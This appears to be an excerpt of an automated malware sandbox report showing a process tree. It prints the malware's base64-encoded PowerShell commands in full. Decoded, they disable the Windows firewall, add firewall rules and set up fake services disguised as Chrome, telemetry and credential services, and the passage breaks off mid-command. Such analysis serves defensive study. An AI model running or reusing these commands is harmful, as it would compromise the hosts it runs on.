FMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQwBoAHIAbwBtAGUAIABVAHAAZABhAHQAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAEMAaAByAG8AbQBlACAAVQBwAGQAYQB0AGUAIgAgAC0ARwByAG8AdQBwACAAIgBDAGgAcgBvAG0AZQAgAFUAcABkAGEAdABlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQwBoAHIAbwBtAGUAIABVAHAAZABhAHQAZQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBDAGgAcgBvAG0AZQAgAFUAcABkAGEAdABlACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAEMAaAByAG8AbQBlACAAVQBwAGQAYQB0AGUAIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAGwASQBoAG8AcwB0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABUAHUAbgBpAG4AZwAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAVAB1AG4AaQBuAGcAIABTAGUAcgB2AGkAYwBlACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFQAdQBuAGkAbgBnACAAUwBlAHIAdgBpAGMAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAGwASQBoAG8AcwB0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAVABlAGwAZQBtAGUAdAByAHkAIABNAGEAbgBhAGcAZQByACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIABTAGUAcgB2AGkAYwBlACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABsAEkAaABvAHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAG0AeQBzAHQALQBsAGEAdQBuAGMAaABlAHIALQBhAG0AZAA2ADQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIABNAGEAbgBhAGcAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIABNAGEAbgBhAGcAZQByACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIABNAGEAbgBhAGcAZQByACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAG0AeQBzAHQALQBsAGEAdQBuAGMAaABlAHIALQBhAG0AZAA2ADQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABtAHkAcwB0AC0AbABhAHUAbgBjAGgAZQByAC0AYQBtAGQANgA0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAUwB5AG4AYwBoAHIAbwBuAGkAegBhAHQAaQBvAG4AIABTAGUAcgB2AGkAYwBlACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFMAeQBuAGMAaAByAG8AbgBpAHoAYQB0AGkAbwBuACAAUwBlAHIAdgBpAGMAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABtAHkAcwB0AC0AbABhAHUAbgBjAGgAZQByAC0AYQBtAGQANgA0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBtAHkAcwB0AF8AbABhAHUAbgBjAGgAZQByAF8AdABjAHAAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBtAHkAcwB0AF8AbABhAHUAbgBjAGgAZQByAF8AdABjAHAAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAC4AbQB5AHMAdABlAHIAaQB1AG0ALQBiAGkAbgBcAG0AeQBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABQAHUAYgBsAGkAYwAgAC0AUAByAG8AdABvAGMAbwBsACAAVABDAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAG0AeQBzAHQAXwBsAGEAdQBuAGMAaABlAHIAXwB1AGQAcAAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAG0AeQBzAHQAXwBsAGEAdQBuAGMAaABlAHIAXwB1AGQAcAAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwALgBtAHkAcwB0AGUAcgBpAHUAbQAtAGIAaQBuAFwAbQB5AHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAFAAdQBiAGwAaQBjACAALQBQAHIAbwB0AG8AYwBvAGwAIABVAEQAUAAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBtAHkAcwB0AC4AZQB4AGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBtAHkAcwB0AC4AZQB4AGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAC4AbQB5AHMAdABlAHIAaQB1AG0ALQBiAGkAbgBcAG0AeQBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABQAHUAYgBsAGkAYwAgAC0AUAByAG8AdABvAGMAbwBsACAAVABDAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAG0AeQBzAHQALgBlAHgAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAG0AeQBzAHQALgBlAHgAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwALgBtAHkAcwB0AGUAcgBpAHUAbQAtAGIAaQBuAFwAbQB5AHMAdAAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAASQBuAGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAFAAdQBiAGwAaQBjACAALQBQAHIAbwB0AG8AYwBvAGwAIABVAEQAUAAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBOAGUAdAB3AG8AcgBrACAARABpAHMAYwBvAHYAZQByAHkAIABTAGUAcgB2AGkAYwBlACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIATgBlAHQAdwBvAHIAawAgAEQAaQBzAGMAbwB2AGUAcgB5ACAAUwBlAHIAdgBpAGMAZQAiACAALQBHAHIAbwB1AHAAIAAiAE4AZQB0AHcAbwByAGsAIABEAGkAcwBjAG8AdgBlAHIAeQAgAFMAZQByAHYAaQBjAGUAIgAgAC0ATABvAGMAYQBsAFAAbwByAHQAIAA4ADAALAAgADQANAAzACwAIAAyADAAMgAwACwAIAAyADQAMAA0ACwAIAAzADMAMwAzACwAIAA0ADQANAA0ACwAIAA1ADUANQA1ACwAIAA0ADQANAA5ACwAIAA0ADAANQAwACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AUAByAG8AdABvAGMAbwBsACAAVABDAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE4AZQB0AHcAbwByAGsAIABEAGkAcwBjAG8AdgBlAHIAeQAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBOAGUAdAB3AG8AcgBrACAARABpAHMAYwBvAHYAZQByAHkAIABDAG8AbgB0AHIAbwBsACIAIAAtAEcAcgBvAHUAcAAgACIATgBlAHQAdwBvAHIAawAgAEQAaQBzAGMAbwB2AGUAcgB5ACAAQwBvAG4AdAByAG8AbAAiACAALQBMAG8AYwBhAGwAUABvAHIAdAAgADgAMAAsACAANAA0ADMALAAgADIAMAAyADAALAAgADIANAAwADQALAAgADMAMwAzADMALAAgADQANAA0ADQALAAgADUANQA1ADUALAAgADQANAA0ADkALAAgADQAMAA1ADAAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAFAAcgBvAHQAbwBjAG8AbAAgAFQAQwBQACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAFMAZQB0AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFAAcgBvAGYAaQBsAGUAIAAtAFAAcgBvAGYAaQBsAGUAIABEAG8AbQBhAGkAbgAsAFAAdQBiAGwAaQBjACwAUAByAGkAdgBhAHQAZQAgAC0ARQBuAGEAYgBsAGUAZAAgAEYAYQBsAHMAZQAKAA==
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2872
                  • C:\Windows\system32\chcp.com
                    "C:\Windows\system32\chcp.com" 65001
                    7⤵
                      PID:516
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell.exe -exec bypass -enc YwBoAGMAcAAgADYANQAwADAAMQAKACQAUAByAG8AZwByAGUAcwBzAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAJwBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACcACgAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABMAG8AYwBhAGwATQBhAGMAaABpAG4AZQAgAEIAeQBwAGEAcwBzACAALQBGAG8AcgBjAGUACgAKACQAcwBlAHIAdgBpAGMAZQBzACAAPQAgAEAAKAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAFAAcgBvAGcAcgBhAG0AcwBDAGEAYwBoAGUAIgA7ACAARABpAHMAcABsAGEAeQBOAGEAbQBlAD0AIgBDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAiADsAIABEAGUAcwBjAHIAaQBwAHQAaQBvAG4APQAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiADsAIABCAGkAbgBhAHIAeQBQAGEAdABoAE4AYQBtAGUAPQAiACQAZQBuAHYAOgBQAFIATwBHAFIAQQBNAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAFIAZQBnAGUAZABpAHQAQwBhAGMAaABlACIAOwAgAEQAaQBzAHAAbABhAHkATgBhAG0AZQA9ACIAUgBlAGcAaQBzAHQAcgB5ACAARQBkAGkAdABvAHIAIABDAGEAYwBoAGUAIABDAG8AbgB0AHIAbwBsACIAOwAgAEQAZQBzAGMAcgBpAHAAdABpAG8AbgA9ACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAEMAYQBjAGgAZQAgAFIAZQBnAGkAcwB0AHIAeQAgAFAAcgBvAGcAcgBhAG0AIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAOwAgAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQA9ACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAGUAZABpAHQALgBlAHgAZQAiAH0ALAAKACAAIAAgACAAQAB7AE4AYQBtAGUAPQAiAEQAZQB2AEEAcwBzAG8AYwBNAGEAbgAiADsAIABEAGkAcwBwAGwAYQB5AE4AYQBtAGUAPQAiAEQAZQB2AGkAYwBlACAAQQBzAHMAbwBjAGkAYQB0AGkAbwBuACAATQBhAG4AYQBnAGUAcgAiADsAIABEAGUAcwBjAHIAaQBwAHQAaQBvAG4APQAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABEAGUAdgBpAGMAZQAgAEEAcwBzAG8AYwBpAGEAdABpAG8AbgAgAE0AYQBuAGEAZwBlAHIAIAB1AHMAZQBkACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAbwB0AGgAZQByACAAcAB1AHIAcABvAHMAZQBzAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAHMAdABvAHAAcABlAGQALAAgAHMAaABhAGQAbwB3ACAAYwBvAHAAaQBlAHMAIAB3AGkAbABsACAAYgBlACAAdQBuAGEAdgBhAGkAbABhAGIAbABlACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAdABoAGUAIABiAGEAYwBrAHUAcAAgAG0AYQB5ACAAZgBhAGkAbAAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABkAGkAcwBhAGIAbABlAGQALAAgAGEAbgB5ACAAcwBlAHIAdgBpAGMAZQBzACAAdABoAGEAdAAgAGUAeABwAGwAaQBjAGkAdABsAHkAIABkAGUAcABlAG4AZAAgAG8AbgAgAGkAdAAgAHcAaQBsAGwAIABmAGEAaQBsACAAdABvACAAcwB0AGEAcgB0AC4AIgA7ACAAQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgB9ACwACgAgACAAIAAgAEAAewBOAGEAbQBlAD0AIgBOAGcAYwBDAHAAbQByAFMAdgBjACIAOwAgAEQAaQBzAHAAbABhAHkATgBhAG0AZQA9ACIATQBpAGMAcgBvAHMAbwBmAHQAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABQAGEAcwBzAHAAbwByAHQAIgA7ACAARABlAHMAYwByAGkAcAB0AGkAbwBuAD0AIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAATQBpAGMAcgBvAHMAbwBmAHQAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABQAGEAcwBzAHAAbwByAHQAIAB1AHMAZQBkACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAbwB0AGgAZQByACAAcAB1AHIAcABvAHMAZQBzAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAHMAdABvAHAAcABlAGQALAAgAHMAaABhAGQAbwB3ACAAYwBvAHAAaQBlAHMAIAB3AGkAbABsACAAYgBlACAAdQBuAGEAdgBhAGkAbABhAGIAbABlACAAZgBvAHIAIABiAGEAYwBrAHUAcAAgAGEAbgBkACAAdABoAGUAIABiAGEAYwBrAHUAcAAgAG0AYQB5ACAAZgBhAGkAbAAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABkAGkAcwBhAGIAbABlAGQALAAgAGEAbgB5ACAAcwBlAHIAdgBpAGMAZQBzACAAdABoAGEAdAAgAGUAeABwAGwAaQBjAGkAdABsAHkAIABkAGUAcABlAG4AZAAgAG8AbgAgAGkAdAAgAHcAaQBsAGwAIABmAGEAaQBsACAAdABvACAAcwB0AGEAcgB0AC4AIgA7ACAAQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlAD0AIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAfQAsAAoAIAAgACAAIABAAHsATgBhAG0AZQA9ACIAUgBlAG0AZQBkAHkAUAByAG8AYwAiADsAIABEAGkAcwBw